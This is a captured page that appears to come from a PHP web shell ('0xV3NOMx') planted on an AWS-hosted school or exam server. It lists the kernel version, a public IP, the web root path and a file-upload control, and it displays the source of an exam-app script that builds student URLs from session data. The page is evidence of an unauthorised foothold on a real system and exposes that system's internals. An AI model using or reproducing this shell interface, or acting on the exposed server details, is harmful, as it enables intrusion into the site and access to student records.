0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.17.78.184


Current Path : /var/www/html/gcg/adm/admin/src/
Upload File :
Current File : /var/www/html/gcg/adm/admin/src/examapp_iframe.php

<?php

include ("database.php");
$row['status'] = 'success';
$parameters = "r=".$_SESSION['REGNO']."&c=".$_SESSION['CATEGORY']."&li=".$_SESSION['FEETYPE'];

$row['url'] = 'http://logisys.net.in/student/'.$_SESSION['FOLDER'].'/student.php?'.$parameters;
echo json_encode($row);

?>